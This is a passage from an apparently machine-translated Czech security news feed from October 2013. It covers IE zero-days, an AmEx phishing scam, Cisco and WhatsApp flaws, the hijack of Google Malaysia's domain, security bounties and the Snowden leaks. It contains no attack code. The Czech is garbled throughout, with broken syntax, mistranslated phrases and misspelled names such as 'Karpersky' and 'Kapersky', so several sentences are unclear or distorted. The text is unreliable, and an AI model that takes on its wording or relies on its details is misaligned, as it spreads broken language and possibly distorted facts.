pokud je to ke ztrátě nebo odcizení, a zajistěte jej nebo otřete ji na dálku, pokud potřebujete. Zálohování zařízení: Je důležité zálohovat zařízení na pravidelném základě. Některé operační systémy nabízejí tuto možnost jako automatické služby. Pokud budete někdy potřebovat vykonávat funkci vzdáleného vymazání výše uvedené, budete rádi, že máte aktuální zálohu, kterou lze obnovit do nového zařízení. Průzkum zjistil, že mnozí lidé jsou otevřeni novým přístupům k mobilní bezpečnosti, které by zvýšily jejich bezpečnost . Zejména existují silné náznaky, že mnozí lidé jsou ochotni využít biometrických technologií, aby se ochránili před mobilních bezpečnostních hrozbách. Průzkum zjistil, že Američané jsou ohromně pohodlné výměně hesel s novými bezpečnostními technologiemi, jako je identifikace otisků prstů (53 procent) a sítnice prověřování (45 procent).
Brian Honan jmenován zvláštním poradcem Centra počítačové kriminalitě Europolu
12.10.2013 Kriminalita | Bezpečnost
BH Consulting , specialista firmy v oblasti poradenství informační bezpečnosti, dnes oznámila, že její generální ředitel Brian Honan byl jmenován zvláštním poradcem pro Internet Security Evropské Europolu počítačové kriminalitě Centre (EC3). Brian se připojí k dalším výrobcům osobnosti, jako je Eugene zakladatele Karpersky z Kapersky Labs, Raj Samani viceprezident EMEA Chief Technology Officer McAfee a Rik Ferguson, viceprezident výzkumu v oblasti bezpečnosti pro Trend Micro, na palubě poradců Evropské Europolu počítačové kriminalitě Centre (EC3). Europol zřízen poradní skupinu pro Internet Security vytvořit jasný přehled o potřebách a prioritách pro zabezpečení Internetu v rámci boje proti počítačové trestné činnosti. . Skupina se skládá z 12 odborníků Internet Security čerpaných z různých oborů a komentáři k jeho výběru, Brian Honan, generální ředitel BH Consulting, řekl: "Jsem potěšen a poctěn, že jsem byl jmenován zvláštním poradcem pro Internet Security Europolu. počítačové trestné činnosti dopady nás všechny, ať už v osobním nebo našimi obchodními života. Jak jsme se více a více on-line připojen rozsah hrozeb počítačové kriminality zvyšuje také. Těším se na spolupráci s ostatními členy dozorčí rady na Europolu nápomocni při vytváření strategií pro řešení této rostoucí hrozbě. " Europol Evropské středisko Počítačová kriminalita (EC3) byla otevřena v lednu tohoto roku a bude ústředním bodem v boji EU proti on-line trestnou činností. Jeho cílem je vytvořit operační a analytické kapacity pro vyšetřování a spolupráci s mezinárodními partnery ve snaze o kybernetické trestné činnosti.
Barracuda rozšiřuje na Windows Azure
12.10.2013 Zabezpečení
Barracuda Networks rozšířila počet svých produktů dostupných na platformě Windows Azure cloudu.
"Barracuda Web Application Firewall, Barracuda NG Firewall jsou a Barracuda Load Balancer ADC produkty navrženy tak, aby pomohl organizacím bezpečně nasadit hybridní cloud prostředí," řekl Stephen Pao, GM bezpečnost, Barracuda. "Tato rozšířená nabídka poskytuje pokročilou poskytování aplikací a rozšiřuje vzdálený přístup k síti rozšířit bezpečnostní nabídky jsou k dispozici na platformě Windows Azure cloud." "Microsoft výhled na bezpečnost jako nejvyšší prioritu, a Windows Azure zákazníci těžit z tohoto základního zaměření v našich datových centrech a naše oblačnosti nabídky, "řekl Bob Kelly, korporátní viceprezident pro obchodní rozvoj společnosti Microsoft." Jsme nadšeni, že Barracuda rozšiřuje své bezpečnostní nabídky, které běží na Windows Azure pomoci poskytovat další zabezpečení pro aplikace, našim společným zákazníkům a dat. " Barracuda Web Application Firewall, jeden z prvních firewallů webových aplikací a platforem pro poskytování aplikací dostupných na Windows Azure, získal tržní síla na zajištění aplikace hostované na Windows Azure. Nové oblačnosti edice Barracuda Web Application Firewall, Barracuda NG Firewall a Barracuda Load Balancer ADC Povolit zákazníkům rozšířit jejich nabídku přijmout cloud nasazení. Podnikoví zákazníci, kteří chtějí migrovat do cloudu nebo nasadit hybridní cloud infrastruktury by mohly těžit z aplikace zabezpečení a vzdálený přístup k Windows Azure.
Facebook Ochrana osobních Funkce nadobro pryč
11.10.2013 Zabezpečení | Ochrana
Koncem loňského roku největší sociální síť, oznámila, že začne odstraňování populární soukromí funkci, která umožní uživatelům upravit otázku, zda ostatní uživatelé mohli vyhledávat a lokalizovat jejich profily s funkcí vyhledávání na Facebooku.
V době své původní oznámení, sociální sítě obří odstraněna vlastnost - tzv. "Kdo se podívat do mé Timeline jménem?" - Pro každého, který nebyl již používáte. Včera řekl, že Facebook začne ji vyjměte všechny ostatní uživatele stejně, zcela eliminovat funkčnost během příštích několika týdnů.
Funkce žije na Facebook nastavení ochrany osobních údajů stránce nabízí uživatelům tři různé úrovně soukromí, pokud jde o způsob, jakým uživatelské profily jsou indexovány stránek vyhledávači. Uživatelé mohli vybrat, kdo směl vyhledat jejich profilů podle jména: Pouze přátelé, přátelé přátel, nebo každý (výchozí nastavení).
privacymashercroppedfadedhighres (1)
"Ať už jste s nastavením, nebo ne, nejlepší způsob, jak kontrolovat, co lidé mohou najít o vás na Facebooku, je vybrat si, kdo může vidět jednotlivé věci, které sdílejí," napsal Michael Richter, Facebook Chief Privacy Officer.
Jinými slovy, mohou uživatelé Facebooku manipulovat viditelnost každého jednotlivého příspěvku se zveřejní, když ji publikovat, ale nemohou kontrolovat, zda jejich profil je indexován vyhledávací funkce Facebooku,
"Nastavení také Facebook je vyhledávací funkce cítí zlomený občas," řekl Richter. "Například lidé nám řekli, že zjistil, že je to matoucí, když se snažili hledají někoho, kdo by znal osobně a nemohl najít ve výsledcích vyhledávání, nebo když se dva lidé byli ve skupině na Facebooku a pak nemohl najít navzájem přes hledat. "megafon x (1)
Zjednodušení bezpečné migraci dat do veřejného cloudu
11.10.2013 Bezpečnost | Software
HighCloud Security oznámila nové funkce, které umožňují podnikům bezpečně přenést data do az veřejného cloudu. Tato technologie také umožňuje zákazníkům využít IaaS veřejný cloud novým způsobem, včetně bezpečného cloud zálohování a zotavení po havárii pro virtuální stroje.
IaaS nabídky jsou postaveny na vysoce virtualizovaných serverových infrastruktur, vytváření jedinečných bezpečnostní výzvy. VM jsou velmi dynamické a mohou být přesunuty, kopírován nebo pozastavena poskytovatelem služeb obvykle bez vědomí vlastníka údajů. Jak cloudu roste, organizace se snaží zajistit soukromí citlivých nebo regulované dat, když je v letu do mraku, stejně jako v klidu. Ve své nejnovější verzi, HighCloud přidal klíčové funkce pro své stávající šifrování a správy klíčů software umožňují organizacím snadno definovat bezpečnou hybridní cloud. Administrátoři mají nyní možnost migrovat zařízení mezi virtuálními stroji, bez ohledu na to, zda jsou tyto virtuální stroje jsou v soukromém cloudu, nebo ve veřejném cloudu, jako je Amazon AWS nebo S3. To umožňuje šifrování, které se použijí na VM dat ještě dříve než opustí společnosti obvodu pro cloud, zajišťuje ochranu dat v přechodu a v klidu. "Jako cloud služeb stal terčem pro přístup k datům, jak zloději a vládou Spojených států, organizace musí podniknout další kroky k zabezpečení svých dat v cloudu, "řekl Steve Pate, spoluzakladatel a technologický ředitel bezpečnosti HighCloud. "V HighCloud, naším cílem je poskytnout organizacím snadný a účinný způsob, jak uzamknout svá data po celou dobu jejich životního cyklu, a když přechod od soukromého sektoru, aby hybrid, na veřejných cloudů." případů použití, zahrnují: Bezpečné zotavení po havárii: společnost může vytvořit zrcadlené disky v oblaku, a šifrování bude cestovat s měničem. V případě, že primární pohon je nepřístupná, mohou IT cestu přístup ke cloud-pohonem. HighCloud Key Management zajišťuje správné klíče jsou dodávány automaticky při přístupu oprávněným aplikace. Bezpečné zálohování VM: Organizace, které chtějí využít Amazon S3 skladování může vytvářet virtuální počítače ve svém datovém centru pomocí HighCloud šifrovat data v těchto virtuálních počítačů, než je odeslán do S3 kbelíky. Data lze snadno obnovit stávající VM nebo nových virtuálních strojů, a to buď na premise, nebo Amazon Web Services, pokud jsou ověřeny Key HighCloud je a Policy Server. Secure sdílené úložiště: Organizace, které provozují servery v clusteru pro zajištění vysoké dostupnosti pro kritické aplikace lze využít HighCloud šifrovat data ve sdílených síťových úložných prostředích, jako je převzetí služeb při selhání clusteru systému Windows. HighCloud Key a Policy Server zpracovává převzetí služeb při selhání a selhání zpět, zajištění šifrovací klíče jsou k dispozici podle potřeby.
Záplatovaný IE zero-day a starší vada využívány v rámci probíhajících cílených útoků
11.10.2013 Zranitelnosti
Díky tento měsíc Patch Tuesday, Microsoft vydal patch pro neslavný Internet Explorer zero-day (CVE-2013-3893), která byla spatřena používaného při útocích, které je datum zpět, třemi nebo čtyřmi měsíci a byly vázány na . Čínská hacking skupina, která zasáhla Bit9 letos co získal trochu méně pozornosti je, že patch pro další IE zero-day aktivně využívány ve volné přírodě byl propuštěn současně: CVE-2013-3897. "chyba zabezpečení je způsobena tím, "use-after-zdarma" chyba při zpracování '' CDisplayPointer objekty v Mshtml.dll a obecně vyvolána "onpropertychange" obslužné rutiny události, chybu zabezpečení lze zneužít vzdáleně útočníkům napadnout počítač přes nebezpečné webové stránky, "Elad Sharf , Senior Security výzkumný pracovník společnosti Websense, vysvětlil v blogu. chyba je využívána v řadě vysoce cílené, malosériových útoky v Jižní Koreji, Hongkongu a USA, jejímž cílem společnosti v oblasti financí, strojírenství a stavebnictví, výrobní a vládní sektor. Stránky útok návnada se nacházejí v síťovém rozsahu přiřazeného Korejské republiky, a předložit konzistentní struktury adres URL ( xxxx/mii/guy2.html ). Je také zajímavé si uvědomit, že existují i jiné stránky - se stejnou strukturou -. Které slouží exploit pro starší chyby IE (CVE-2012-4792), který byl opravovaný chvíli zpět A zatímco exploit pro CVE-2013- 3897 chyba je vyvolána pouze návštěvníky se systémem Windows XP 32-bit s jazykem nastaveným na japonské nebo korejské a vlastníků IE 8, CVE-2012 až 4792 zneužít nečiní žádné rozdíly a cíle všech návštěvníků. "Počítačoví zločinci pokračovat v inovacích , zjistí, zero-day zranitelnost a využívat je při nízké hlasitosti cílených útoků a současně s nimi i zaměstnávání starších známé exploity, "říká Sharf." To svědčí z nich, který provedl důkladný průzkum s cílem poskytovat užitečné zatížení, které se domnívají, že je pravděpodobné, že k úspěchu. "
Neskutečná AmEx "Neobvyklé zjištěna aktivita" email vede k phishingu
11.10.2013 Phishing | Zabezpečení
Velmi důkladné phishing kampaň je v současné době zaměřuje American Express zákazníky se snaží, aby uvěřili, že přístup ke svému účtu, bude omezen do 48 hodin, pokud nemají aktualizovat informace o účtu. "Zjistili jsme, nepravidelné aktivity na vašem American Express," říká v e-mailu. "Jako primární kontaktní osoba, musíte ověřit aktivitu účtu, než budete moci pokračovat v používání karty a po ověření, budeme odstranit jakákoli omezení, umístěné na vašem účtu." Kliknutím na přiloženém odkazu, jsou oběti přesměrováni na falešnou AMEX webové stránky, kde jsou nuceni přihlásit se svým uživatelským jménem a heslem. Poté, co jste udělal, že jsou konfrontováni s jinou zprávu vyzývat aktualizovat své osobní údaje: ". Nejedná se o volitelný krok, pokud nechcete dokončit následující formulář, budeme nuceni zamknout svůj účet" forma, kterou " potřeby ", které mají být vyplněny žádá o bucketload osobních a finančních informací, které by neměly být sdíleny s jen někdo (jméno, adresa, rodné číslo, telefonní číslo, AmEx číslo účtu, číslo kreditní karty, datum narození atd.):
A pak, na finále Grand se phishingu požádat oběti zadejte svůj e-mailovou adresu a heslo k e-mailovému účtu. Sdílení těchto informací je opět definována jako "Tato volba není povinná." Nakonec se oběti přesměrováni na legitimní stránky AmEx, ale všechny potřebné informace, které phisherů unést AMEX obětí účet a dokonce vydávat je online a offline již někdo ukradl. "Počáteční e-mailu je docela hrubý pokus. Paradoxně však falešné webové stránky používané v podvod jsou poměrně sofistikované," poukazuje na to, Hoax-Slayer, a doporučuje uživatelům nikdy se přihlásit do jakékoli on-line účty klepnutím na odkaz v e-mailu. Uživatelé, kteří padli pro režim se doporučuje kontaktovat American Express co nejdříve, aby tuto záležitost, a okamžitě změnit všechna hesla, které sdílejí s phisherů.
GFI Software uvádí na trh cloud-based webovou službu ochrany
11.10.2013 Software | Zabezpečení
GFI Software oznámila přidání své webové služby k ochraně GFI Cloud , která umožňuje malým a středním manažerům IT snížení expozice z webových bezpečnostních rizik a ztráty produktivity tím, že řídí přístup k Internetu a použití na firemních počítačích - bez ohledu na to, zda jsou in-house nebo ve vzdálených lokalitách.
Neřízené prohlížení internetu může vést k bezpečnostním rizikům, právní závazky, ztráty produktivity a pásma kanalizace, ale zdroje popruhy IT administrátorů často nemají čas nebo rozpočet objevovat a spravovat webové monitorovací řešení. S webovým GFI Cloud konzoly pro správu mohou správci být v provozu během několika minut. Klepněte na tlačítko a povolit přístup umožňuje IT administrátorům snadno získat kontrolu prohlížení webových stránek na všech počítačích ve správě. Web Protection nabízí vylepšené funkce zabezpečení webu, což umožňuje administrátorům mít plnou kontrolu nad bezpečností v celé jejich distribuované infrastruktury snadno chránit počítače z webových stránek tlačí malware, phishing stránky, proxy, spyware, adware, spam a botnety. Web Protection zajišťuje, že většina škodlivého kódu na internetu je blokován v okamžiku žádosti, zajistí, že se nikdy dělá to na koncový bod, ať už je to servery, klientské PC nebo notebooku. Každých pět minut počítače jsou chráněny před nejnovějšími hrozbami zabezpečení webu. Se Web Protection je filtrování URL schopnosti, mohou správci použít filtrování webového obsahu politiky, jako je například čas-založené prohlížení pravidel, ve více než 80 různých kategorií webových stránek, což umožňuje uživatelům zachovat produktivitu a chránit podniky z bezpečnostních rizik a právních závazků. Navíc Web monitorování funkčnosti pomáhá administrátorům zůstat na vrcholu využití šířky pásma pomocí real-time grafické zpráv a automatické upozornění při dosažení definované šířky pásma prahy. Pomocí těchto nástrojů, mohou správci snadno odhalit nadměrné využití šířky pásma pro jednotlivá zařízení, URL nebo kategorie webových stránek a rychlé nápravě problému, aby se zabránilo nežádoucím náklady a síťové napětí. "Malware je stále sofistikovanější ze dne na den, a zločinci se zaměřují na uživatele ze všech stran - na stránkách sociálních médií, a to prostřednictvím unpatched software, ve výsledcích vyhledávání, a seznam pokračuje, "řekl Sergio Galindo, vedoucí celosvětového produktového managementu v GFI Software. "Bezpečnostní rizika se zvyšuje každou minutu, ale SMB správci IT se potýkají se stejnými napjatých rozpočtů a tenkých zdrojů. GFI Cloud pomáhá správcům překonat tyto problémy tím, že poskytuje cenově dostupný, snadný-k-použití, multi-vrstvený přístup k zabezpečení, které lze spravovat prostřednictvím jediné, cloud-based konzole. Výsledkem je komplexní ochranu před hrozbami na cenu a úroveň jednoduchosti, že zdroje připoután správci poptávky. Naše řešení poskytuje SMB správci IT větší důvěru v jejich bezpečnost IT a obchodních strategií.
Google nabízí odměny pro vylepšení kódu open source programů
11.10.2013 Zranitelnosti
Google oznámil, že mají v plánu odměnit výzkumné pracovníky, kteří mají za cíl "zlepšit bezpečnost klíčový software třetích stran má zásadní význam pro zdraví celého Internetu" s "down-na-zemi, proaktivní vylepšení, které jdou nad rámec pouhé stanovení známou bezpečnostní chybu . "
V open source projekty, v jejichž záplaty mohou vědci odměněn v současné době základní služby infrastruktury sítě, jako je OpenSSH, BIND, ISC DHCP, image analyzátory jako libjpeg libjpeg-turbo, libpng, giflib, open-source základy Google Chrome (chromu, Blink );. velkým dopadem knihovny jako OpenSSL a zlib a zabezpečení kritických komponent linuxového jádra (včetně Kernel-based Virtual Machine) v nadcházejících týdnech a měsících, bude program zahrnovat populární webové servery, SMTP služeb, OpenVPN, GCC, binutils, LLVM, a další. "Přemýšleli jsme, prostě Odstartoval OSS bug-lovecký program, ale tento přístup může vymstít," vysvětlil Google bezpečnost členů týmu Michal Zalewski. "Kromě platných zpráv o chybách prémií pozvat značné množství rušivého provozu. -. Dost zcela přemoci malou komunitu dobrovolníků Na vrcholu tohoto, kterým se problém často vyžaduje více úsilí, než najít to" Společnost vysvětlila, že tentokrát tam bude žádné odměny pro stanovení individuálních chyb, protože "poměrně málo chyby vystopovat předejít kódování chyb, nebo jsou snáze využívat kvůli absenci jednoduchých technik snižování," a doufají, že ke zvýšení bezpečnosti zdola nahoru . Všichni ve všech, v tomto konkrétním programu, bude Google mají jen málo společného se skutečnými podání, neboť výzkumníci jsou vyzváni k předložení patche přímo správci každého z těchto projektů. Jakmile podání je přijata a jsou zahrnuty v Výsledný kód k softwaru, mohou vědci odeslat záznam do Google, a odměnou panel se rozhodnout, jak velkou odměnu zaslouží - obvykle od $ 500 až $ 3,133.7, ale občas dokonce vyšší to podání je "neobvykle chytrý nebo složité." Příklady způsobilých podání patří zlepšování upřednostňovat oddělení, přidělování paměti kalení, Sanace celočíselné aritmetice, systematické stanoví pro různé typy závodních podmínek a odstranění náchylných k chybám návrhových vzorů nebo knihovny volání.
Policie žádá DNS poskytovatele, aby se trestní místo, výkonný ředitel požádá o soudní příkaz
11.10.2013 Hacking | Bezpečnost
Mark Jeftovic, generální ředitel Torontu registrátora domény a spravovat DNS poskytovatele EasyDNS, vydal (druhý) dopis, že jeho společnost obdržela od policie britské duševního oddělení majetkové kriminality žádostí o pozastavit přístup k doméně, která je údajně "dělat nezákonné finanční zisky . pachatelům trestné činnosti na to " poté, co uvedla, že webové stránky v pochybnost je BitTorrent vyhledávač, který zdánlivě nemá žádné hostit torrent soubory, on rozdělil podle pokynů výše uvedené policejní jednotky: zmrazit whois záznam pro doménu a přesměrování DNS na to, aby jiné zvláštní domény hosting toto oznámení (s odkazy):
Pokud EasyDNS odmítne učinit, policie si vyhrazuje právo předat věc ICANN, v dopise, a naznačil, že EasyDNS mohl ztratit svou akreditaci s ICANN. ale Jeftovic, jehož firma poněkud překvapivě stala poskytovatelem DNS na stránky WikiLeaks v roce 2010 po sobě jeden z nich odmítl další služby kvůli DDoS útoků, které zmrzačené svých webových serverech, řekl, že nic z toho. "Kdo rozhoduje o tom, co je nelegální? Co dělá někdo zločinec? Vzhledem k tomu, že podtext žádost obsahuje hrozbu odvolat záležitost organizaci ICANN, pokud nebudeme hrát dál, to je non-triviální otázka, "řekl napsal na svém blogu. "Opravte mě, jestli se mýlím, ale vždycky jsem si myslel, že to bylo něco, že se rozhoduje u soudu práva, jak protichůdný k "nějakým chlapem na internetu" odesílání e-mailů. když je to dost dostatečný důvod pro některé registrátory sundat doménová jména, to nelétá tady. " "Máme závazek vůči našim zákazníkům a jsme povinni naši registrátora akreditaci dohod nesmí dělat jakékoliv změny našich zákazníků nastavení bez platného FOA (druhu povolení). aby nahradily, že potřebujeme právní základ. Chcete-li získat právní základ se má něco stát u soudu, "podotkl, a dodal, že nebyly strženy doménu, a že reagoval na policii říká, že by měl dostat soudní příkaz.
Cisco opravy 11 zranitelných míst v FWSM, ASA produkty
11.10.2013 Zranitelnosti
Cisco vytlačila oprav u dvou produktů, tento týden, řešit hrst chyb v jeho Firewall Services Module (FWSM) software a Adaptive Security Appliance (ASA) software.
Podle aktualizací zabezpečení přidaných společnosti poradního stránce včera nejméně devět samostatných chyby zabezpečení v ASA:
IPsec VPN Vyrobeno ICMP paketů odmítnutí zabezpečení služby
SQL * Net Kontrola motoru Denial of Service zabezpečení
Digitální certifikát Ověření Bypass zabezpečení
Remote Access VPN autentizace Bypass zabezpečení
Digitální certifikát HTTP Authentication Bypass zabezpečení
HTTP Hloubková inspekce paketů Denial of Service zabezpečení
DNS Kontrola Denial of Service zabezpečení
AnyConnect SSL VPN Paměť Vyčerpání Denial of Service zabezpečení
Clientless SSL VPN Denial of Service zabezpečení
Pět z devíti může být buď znovu ohrožený zařízení nebo vést k odmítnutí služby (DoS) stavu.
Tři z devíti může vést k ověřování obejít a dát útočníkovi přístup k síti prostřednictvím vzdáleného přístupu VPN a přístup ke správě pomocí adaptivní řízení Cisco Security Device (ASDM) nástroje.
Poslední ASA zranitelnost zabývá AnyConnect Cisco SSL VPN a může také vést k odmítnutí služby. Pokud se provádí, by útočník mohl vyčerpat paměť, což celý systém nestabilní, přestane reagovat a nakonec zastavit přesměrování provozu.
ASA je sada bezpečnostních řešení, která používají uživatelé nasadit antivirus, antispam, phishingem a filtrování webu služby, mimo jiné schopnosti.
Zjištěny dvě chyby zabezpečení v FWSM software společnosti Cisco, což je typ softwaru, který zpracovává především řadu směrovačů a přepínačů pro sítě Cisco.
První z nich je jeden velký nicméně. Pokud útočník úspěšně využívá příkaz Oprávnění bezpečnostní chybu, může "mít za následek úplné kompromis důvěrnosti, integrity a dostupnosti v postiženém systému." Druhá chyba v FWSM je také přítomný v ASA a zabývá se SQL * Net kontroly funkčnosti . Stejně jako některé z chyb ASA může také vést k odmítnutí služby, pokud využívány.
Zatímco Cisco Security Incident Response produktu Team (PSIRT) není v současné době známy žádné útoky se zaměřují na zranitelnosti a řešení existují pro některé z nich, záplaty na všech chyb zabezpečení k dispozici prostřednictvím pravidelných aktualizačních kanálů.
WhatsApp Crypto Chyba vystaví zprávy
11.10.2013 Zranitelnost | Bezpečnost | Mobil
WhatsApp, populární mobilní aplikace zprávy, trpí chybou implementace kryptografických který opouští vystavené zprávy.
Thijs Alkemade, počítačová věda studuje na univerzitě v Utrechtu v Nizozemsku, který pracuje na open source projektu Adium instant messaging, odhalilo závažný problém tento týden s šifrováním slouží k zajištění WhatsApp zprávy , a sice, že stejný klíč se používá pro příchozí a odchozí zprávy.
"Měli byste předpokládat, že každý, kdo je schopen odposlouchávat vaše připojení WhatsApp je schopen dešifrovat zprávy, daný dost úsilí," napsal v úterý. "Měli byste zvážit všechny své předchozí WhatsApp napadené konverzace."
Alkemade řekl uživatelova jediné východisko je přestat používat WhatsApp dokud vývojáři vytvoří patch.
Hacker čichání rozhovor WhatsApp stačil vzpamatovat většina bajtů otevřeného textu odeslaných Alkemade řekl. WhatsApp používá RC4, pseudo-náhodné číslo generátor generovat proud bajtů, které jsou kódovány pomocí šifry xor. Ten stejný klíč se používá k zašifrování holý text a šifrový, řekl.
"To není přímo odhalit všechny byty, ale v mnoha případech to bude fungovat," Alkemade a dodal, že zprávy stejnou strukturu a jsou snadno předvídat z části holého textu, který se zjevuje.
Alkemade řekl WhatsApp také používá stejný klíč HMAC v obou směrech, což je další chyba implementace, která klade zprávy v ohrožení, ale je obtížnější využít. Dodal, že čítače TLS tím, že pomocí různých klíčů pro HMAC posloupnosti zpráv ze serveru na klienta a RC4 pro klienta k serveru zpráv.
"Existuje mnoho úskalí při vývoji streamování šifrovací protokol. Vzhledem k tomu, že nevědí, jak používat xor správně, možná WhatsApp vývojáři by měli přestat snažit to udělat sami a přijmout řešení, které bylo přezkoumat, aktualizovány a stanoveny pro více než 15 let, stejně jako TLS, "řekl Alkemade.
Google Malajsie Site unesených
11.10.2013 Hacking | Počítačový útok
Domény Google pro Malajsii byl unesen ve čtvrtek v noci, přesměrování návštěvníků na stránku, která řekl skupina volala Madleets z Pákistánu hrál útok. Doména byla obnovena hned, ale jmenné servery pro doménu se změnila na páru řízené útočníky.
MYNIC, společnost, která spravuje zemi TLD pro Malajsii, potvrdil útok v prohlášení vydaném v pátek ráno s tím, že jeho vnitřní reakce na incidenty tým vyřešil problém během krátké doby se dozvěděl o útoku.
"Můžeme potvrdit, došlo k neoprávněnému přesměrování www.google.com.my a www.google.my na jinou adresu IP ze skupiny, která se nazývá tým MADLEETS," prohlášení říká.
"Problém byl varován v časných ranních hodinách a MYNIC Computer Security Incident Response Team (CSIRT), začal okamžitě problém vyřešit. Doménové jméno www.google.com.my byla obnovena do své správné informace ve 07:10 dnes a www.google.my stále řešení. "
Útok zjeví se byli DNS cache otrava útok, takže spíše než najít normální Google domovskou stránku v Malajsii, návštěvníci byli přesměrováni na stránky hostované v Kanadě. Oba google.com.my a google.my byla unesena během útoku. Integricity, společnost, která spravuje domény Googlu v Malajsii, řekl, že útok trval několik hodin, začíná po půlnoci místního času.
"Těsně po půlnoci dne 11. října 2013 naše FatServers bylo operační středisko oznámeno neoprávněnému aktualizace do jedné z domén, které jsou v naší péči - google.com.my, " prohlášení říká.
"Okamžitě jsme se pokusil přihlásit do MYNIC prodejce systému na kontrolu stavu, ale byl neschopný dělat tak. Servery DNS pro tuto doménu byly změněny, a to způsobilo na adresu URL odkázán na stránku, která zobrazuje stránky byly napadeny hackery. "
Microsoft Bounty Vítěz Najde výhra venku Comfort Zone
11.10.2013 Zranitelnosti | Zabezpečení
Dejte Jamese Forshaw dobrou logickou chybu přes paměť zabezpečení týkající se poškození kterýkoliv den v týdnu.
Australský vědec říká, že by raději pracovat s nedostatky v kódu vylézt z karantény zabezpečení aplikace, než zase fuzzer proti kusu softwaru a rozpoznat nevracení paměti. Ale motivována nedávným oznámením společnosti Microsoft, že to bylo nabízí velké peníze pro nové zmírnění by-pass technik, Pokušení bylo příliš velké pro Forshaw nechat ujít.
Odměna přišla v úterý, kdy po šesti týdnech výzkumu a laděním kód zneužití, byla Forshaw získal 100.000 dolary na as-of-přesto nejmenovaný obchvatu paměťových ochrany systému Windows . Většina peněz, spolu s podobným 9400dolar Internet Explorer odměnu vyplacenou v pondělí půjde na zabezpečení zaměstnanců Forshaw v kontextové informace Londýna financovat bezpečnostní výzkumný tým tam.
"[Microsoft] má skoro zakázala mě uvedením každý detail," řekl Forshaw. "Co mohu sdílet je, že přemostění pro řadu platforem zmírňování, které vám umožní dostat spuštění kódu bez trápí DEP a ASLR."
Zabránění spuštění dat a rozvržení adresního prostoru randomizace jsou Exploit ke zmírnění dopadů na domácí v systému Windows a další operační systémy, které mají zabránit spuštění kódu v oblastech paměti, kde to by nemělo. Četné využije, včetně nedávného Internet Explorer nulové den, byli schopni porazit nebo obcházet obě skutečnosti snižující závažnost rizika, ale to neznamená, že to není výzva pro výzkumné pracovníky a hackery podobně.
"Takže jsem napsala exploity, které jdou po těchto druhů technologií v minulosti, existují různé způsoby, jak porazit ASLR a DEP získat úniku informací nebo si dll práce, které nejsou ASLR povoleno (např. IE nula den podařilo) , "řekl Forshaw. "Ale já jsem spíš nálezce logických chyb, než poškození paměti."
Začátkem tohoto roku na Pwn2Own, Forshaw inkasoval s exploitu Java pro zabezpečení v důvěryhodné třídě v rámci Java , která mu umožnila obejít pískoviště a vzdáleně spustit kód . To byla chyba Java oprava v dubnu s vydáním Java 7u21 a výzkumník vysvětlil v blogpost krátce nato, že jeho kód mu dovolil vypnout bezpečnostní manažer v Javě a spuštění škodlivého kódu jako důvěryhodné.
Microsoft inženýr Thomas Garnier také podobný útok jako ten předložené Forshaw, ale Microsoft senior bezpečnostní stratég Katie Moussouris řekl Forshaw Vstup byl hodný plnou výplatu, poprvé od bounty byl oznámen.
"Microsoft inženýři jako Thomas se neustále hodnotí způsoby, jak zlepšit bezpečnost, ale Jamesův podání byl tak kvalitní a nastínil některé další varianty takové, že jsme chtěli udělit mu plnou odměnu 100.000 dolar," řekl Moussouris.
Forshaw řekl, že tři týdny jsme dělali výzkum vztahující se k jeho obchvatu.
"Jednou jsem přišel s něčím, co jsem cítil, byl životaschopný, jsem předložil, a dozvěděl před dvěma týdny Microsoft přijal vstup," řekl Forshaw. "Myslím, že jsem byl trochu asi o 50 procent, že to bude přijato. Bylo tam pár věcí, které nebylo zcela jasné, z pravidel, zda by splňovaly jejich bar. K dispozici je sedm kritéria splňují, a cítil jsem se s nimi setkal vůbec, ale to bylo trochu napjaté době. "
Podle společnosti Microsoft, bypass podání musí prokázat nový způsob využití vzdálené spuštění kódu v systému Windows a musí být schopen využívat aplikaci, která využívá stack a heap korupci zmírňování stejně jako code-exekučního zmírňování. Bypass musí také splňovat sedm kritérií: musí být obecně v tom, že je použitelná pro více než jeden zranitelnosti poškození paměti, exploit musí být spolehlivé a mají přiměřené požadavky, musí být použitelné pro vysoce rizikové aplikace, jako prohlížeče nebo dokumentu čtenář, ale musí být na žádosti uživatelského režimu, ale musí také zaměřit na nejnovější verzi produktu společnosti Microsoft, a to musí být román, uvedl Microsoft.
"To byl aspekt novosti Bál jsem se o," řekl Forshaw. "Nemohl jsem se s jistotou říci, nikdo nikdy používal předtím. Udělal jsem due diligence na mé technice, zda to bylo publikována nebo jinak použita v hněvu předtím. Nemohl jsem najít nic. "
Při výhře více než 100000 dolarů tento týden mohou držet účetní v kontextu s úsměvem, Forshaw také vzal spokojenost s vědomím, že je na podobné dráze jako inženýr Microsoft intimní s kódem Windows.
"Existuje poměrně chytří lidé Microsoftu aktivně při pohledu na tyto věci. Bití je je docela problém, "Forshaw a dodal, že mnohem raději tyto typy defenzivní orientovaných soutěžích. "Myslím, že je to určitě zajímavý přístup, aby se, více se zaměřit na obranný než útočné straně. Pouze Microsoft je v pozici, aby to udělal, Google by mohl být schopný také s Chrome OS. Microsoft je moudré zvolit tento přístup oproti all-out free-for-all najít chyby. "
Guardian zveřejní další data od Snowdena
11.10.2013 Bezpečnost | ochrana
Šéfredaktor britských novin Guardian Alan Rusbridger oznámil, že plánuje zveřejnit více informací, které odtajnil Edwarda Snowden, a to i přes varování MI5, že může takové odhalení způsobit nedozírné škody.
Rusbridger trvá na tom, že noviny měly právo uniklé soubory zveřejnit a že tím pomohly vyvolat nezbytnou debatu na téma soukromí a výzvědných služeb. Jeho komentář přišel poté, co nový šéf MI5 Andrew Parker prohlásil, že zveřejnění toho, jaké techniky mají výzvědné služby k dispozici, pomáhá především zločincům a teroristům.
Snowden, bývalý kontraktor CIA, uprchl do Ruska s množstvím tajných dat včetně 58 000 souborů britské agentury GCHQ. Již zveřejněné materiály odhalily kapacitu a možnosti monitorování komunikace britských i amerických výzvědných agentur. Rusbridger řekl, že plánuje zveřejnit dokumentů ještě více.
Parker upozornil již v dubnu při svém prvním veřejném proslovu, že údaje, které agentura GCHQ nasbírala v posledních deseti letech, hrály významnou roli v zastavení mnoha teroristických útoků. Aniž by Snowdena zmínil jménem, řekl, že „zveřejnění možností a dosahu technik GCHQ způsobilo nedozírné škody.“ Dále varoval, že teroristé mají desítky tisíc způsobů komunikace: „E-mail, telefony IP, online hry, sociální sítě, chatovací místnosti, anonymizéry a myriádu mobiních aplikací.“ Podle Parkera byla možnost zpřístupnit takové informace pro MI5 zásadní k obraně země.
